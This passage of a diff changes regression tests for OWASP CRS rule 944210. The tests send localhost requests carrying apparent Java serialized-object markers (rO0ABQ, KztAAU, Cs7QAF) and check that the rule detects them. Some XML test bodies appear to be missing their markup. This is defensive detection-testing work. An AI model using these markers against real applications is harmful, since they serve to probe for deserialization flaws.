"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id 
\"944210\"" + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-32 + desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-6 - desc: "XML attribute name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-33 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-7 - desc: "XML attribute value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-34 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-8 - desc: "XML element value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-35 + desc: "Argument test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-36 + desc: "Argument name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-37 + desc: "Cookie test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-38 + desc: "Cookie name 
includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-39 + desc: "Request header test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-40 + desc: "XML element includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-41 + desc: "XML attribute name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" 
+ Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-42 + desc: "XML attribute value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-43 + desc: "XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-44 + desc: "Nested XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-45 + desc: "Content-Type text/plain includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-46 + desc: "Content-Type application/json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-47 + desc: "Content-Type application/json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-48 + desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + 
-----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-9 - desc: "Nested XML element value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-49 + desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-10 - desc: "Content-Type text/plain includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - 
method: "POST" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-50 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-11 - desc: "Content-Type application/json arg value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"rO0ABQ\"}" - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-51 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-12 - desc: "Content-Type application/json arg name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"rO0ABQ\": \"test\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-13 - desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"rO0ABQ\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-14 - desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"rO0ABQ\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-15 - desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nrO0ABQ\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-16 - desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nrO0ABQ\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - test_title: 944210-17 - desc: "Argument test includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-18 - desc: "Argument name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "KztAAU=test" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-19 - desc: "Cookie test includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=KztAAU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-20 - desc: "Cookie name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: KztAAU=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-21 - desc: "Request header test includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: KztAAU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-22 - desc: "XML element includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - 
data: "value" - output: - no_log_contains: "id \"944210\"" - - - - test_title: 944210-23 - desc: "XML attribute name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - - - test_title: 944210-24 - desc: "XML attribute value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-25 - desc: "XML element value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-26 - desc: "Nested XML element value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-27 - desc: "Content-Type text/plain includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-28 - desc: "Content-Type application/json arg value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"KztAAU\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-29 - desc: "Content-Type application/json arg name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"KztAAU\": \"test\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-30 - desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"KztAAU\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-31 - desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: 
